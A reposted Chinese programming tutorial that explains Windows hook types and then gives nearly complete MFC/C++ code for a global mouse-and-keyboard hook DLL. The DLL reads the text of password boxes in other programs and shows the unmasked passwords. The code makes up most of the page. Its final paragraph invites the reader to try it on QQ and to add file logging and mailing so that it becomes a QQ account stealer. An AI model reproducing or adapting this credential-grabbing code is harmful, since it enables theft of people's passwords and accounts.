分享
 
 
 

利用鼠标键盘钩子截获密码。

王朝vc·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

利用鼠标键盘钩子截获密码。

源码示例:http://zeena.nease.net/soft/GetPass_Src.rar

钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。掌握钩子的编程方法是很有必要的

钩子分类 :

1、WH_CALLWNDPROC和WH_CALLWNDPROCRET: 使你可以监视发送到窗口过程的消息

3、WH_DEBUG 调试钩子

4、WH_FOREGROUNDIDLE 当当应用程序的前台线程大概要变成空闲状态时,系统就会调用 WH_FOREGROUNDIDL

5、WH_JOURNALRECORD 监视和记录输入事件

6、WH_JOURNALPLAYBACK 回放用WH_JOURNALRECORD记录事件

7、WH_KEYBOARD 键盘钩子

9、WH_KEYBOARD_LL 低层键盘钩子

10、WH_MOUSE 鼠标钩子

11、WH_MOUSE_LL 底层鼠标钩子

12、WH_SHELL 外壳钩子

13、WH_MSGFILTER 和 WH_SYSMSGFILTER 使我们可以监视菜单,滚动条,消息框等

安装钩子:

调用函数SetWindowsHookEx安装钩子。其函数原型为:

HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId )

idHook表示钩子类型,它是和钩子函数类型一一对应的。如,WH_KEYBOARD,WH_MOUSE。

Lpfn是钩子函数的地址。

HMod是钩子函数所在的实例的句柄。对于线程钩子,该参数为NULL;对于系统钩子,该参数为钩子函数所在的DLL句柄。 (系统钩子必须在DLL中)

dwThreadId 指定钩子所监视的线程的线程号。对于全局钩子,该参数为NULL。

SetWindowsHookEx返回所安装的钩子句柄。

卸载钩子

调用函数 BOOL UnhookWindowsHookEx( HHOOK hhk)卸载钩子

定义钩子函数

钩子函数是一种特殊的回调函数。钩子监视的特定事件发生后,系统会调用钩子函数进行处理。一般为下:

LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam)

参数wParam和 lParam包含所钩消息的信息,比如鼠标位置、状态,键盘按键等。nCode包含有关消息本身的信,比如是否从消息队列中移出。

实例:

下面我们通过安装鼠标钩子。和键盘钩子还截获输入的密码,并可查看*密码为例,来说明何何使用钩子。

1,进入向导,新建MFC AppWizard(dll) 取名为GetPass,选择MFC Extension DLL,完成。

2,新建一个CGetPassHook 类,基类:CObject,并加入StartHook,StopHook,函数,如下:

class AFX_EXT_CLASS CGetPassHook : public CObject

{

public:

BOOL StopHook();

BOOL StartHook(HWND hwnd);

CGetPassHook();

virtual ~CGetPassHook();

};

3:加入全局共享数据,如下:

#pragma data_seg("ShareData")

HHOOK hKeyBoardHook=NULL; file://keyboar hook

HHOOK hMouseHook=NULL; file://mouse hook

HINSTANCE glhInstance=NULL; file://globle instance

HWND hOutPutWnd=NULL; file://Display Pass Wnd

#pragma data_seg()

4:加入鼠标,键盘钩子处理函数,如下:

LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam)

{ file://鼠标钩子得理函数

LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;

if(nCode>=0)

{

HWND hTargetHwnd=lpMouse->hwnd; file://得到鼠标所在窗口句柄

if(hTargetHwnd)

{

LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); file://得到它的样式

if(style&ES_PASSWORD) file://如果是密码框

{

char szPass[255];

::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);

file://得到密码

::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);

file://显示密码

}

}

}

return CallNextHookEx(hMouseHook,nCode,wParam,lParam);

file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,

file://可以起到截儿消息的目的,我们这里调用之。

}

LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam)

{ file://keyboard hook proc

if(nCode>=0)

{

HWND hTargetHwnd=GetActiveWindow(); file://get active window

if(hTargetHwnd)

EnumChildWindows(hTargetHwnd,EnumWndProc,0); file://枚举所有窗口

}

return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);

file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,

file://可以起到截儿消息的目的,我们这里调用之。

}

这里要介绍下EnumChildWindows函数,原形如下:

BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROC lpEnumFunc,LPARAM lParam);

hWndParent:为枚举窗口的句柄

lpEnumFunc:枚举函数的地址,

lParam:这里为0

5:加入枚举窗口的函数。如下:(注意,因为前面的函数据要用到此函数,所以要么在前面声明,要么放在上面函数之前定义。

BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)

{ file://enum the child window,find passedit

if(hwnd)

{

LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLE

if(style&ES_PASSWORD) file://是密码框

{

char szPass[255];

::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS

::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://显

return TRUE;

}

}

return TRUE;

}

6:在DEF文件中定义段属性: (这步很重要)

SECTIONS

mydata READ WRITE SHARED

7:完成StartHook,StopHook函数,启动/关闭钩子,如下:

BOOL CGetPassHook::StartHook(HWND hwnd)

{ file://install hoook

hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);

file://mouse hook

hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);

file://keyboard hook

if(hMouseHook&&hKeyBoardHook)

{

hOutPutWnd=hwnd; file://显示密码的句柄

return TRUE;

}

return FALSE;

}

BOOL CGetPassHook::StopHook()

{ file://unstall hook

BOOL mHook=UnhookWindowsHookEx(hMouseHook);

BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);

if(mHook&&kHook)

return TRUE;

return FALSE;

}

8:在DLLMAIN函数中得到DLL句柄,要用到glhInstance变量,因此要加入一句,如下:

extern HINSTANCE glhInstance; file://记得这里

extern "C" int APIENTRY

DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)

{

UNREFERENCED_PARAMETER(lpReserved);

if (dwReason == DLL_PROCESS_ATTACH)

{

TRACE0("GETPASS.DLL Initializing!\n");

if (!AfxInitExtensionModule(GetPassDLL, hInstance))

return 0;

new CDynLinkLibrary(GetPassDLL);

glhInstance=hInstance; file://得到句柄

}

else if (dwReason == DLL_PROCESS_DETACH)

{

TRACE0("GETPASS.DLL Terminating!\n");

AfxTermExtensionModule(GetPassDLL);

}

return 1; // ok

}

9:编译,完成DLL部分,

下面建立APP部分。如下:

1:新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace加入到当前工作区,这样方便。

2:将刚才的DLL中的GetPass.lib,和GetPassHook.h拷贝APP所在目录,然后Project->Add to Project-->Files

选择这两个文件。

2:在主对话框中,加入一个EDIT,ID 为IDC_EDIT_PASS

3:在CGetPassWordDlg.h中包含GetPassHook.h文件,声明一个对象。如下:

#include "GetPassHook.h"

class CGetPassWordDlg : public CDialog

{

protected:

CGetPassHook m_hook;

。。。

DECLARE_MESSAGE_MAP()

};

4:在实现文件中:OnInitDialog()中起动HOOK

BOOL CGetPassWordDlg::OnInitDialog()

{

CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);

m_hook.StartHook(pWnd->GetSafeHwnd()); file://install hook

return TRUE; // return TRUE unless you set the focus to a control

}

5:加入WM_DESTROY消息,在退出程序时停止HOOK,如下:

void CGetPassWordDlg::OnDestroy()

{

CDialog::OnDestroy();

m_hook.StopHook(); file://stop hook

}

6:将GetPass.dll拷贝到。EXE一个目录下,

7:编译,运行.

这样,你在输入任何密码框输入密码时,密码都将截获。就算键盘HOOK失效,移动鼠标到密码框,也都获取*号密码,因为我们安装两个HOOK。启动QQ,输入密码,试下看是否已经截获了密码?将本程序稍做修改,将截获的密码输出到文件,并加入发送邮件攻能,一个QQ盗号器就做成了。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有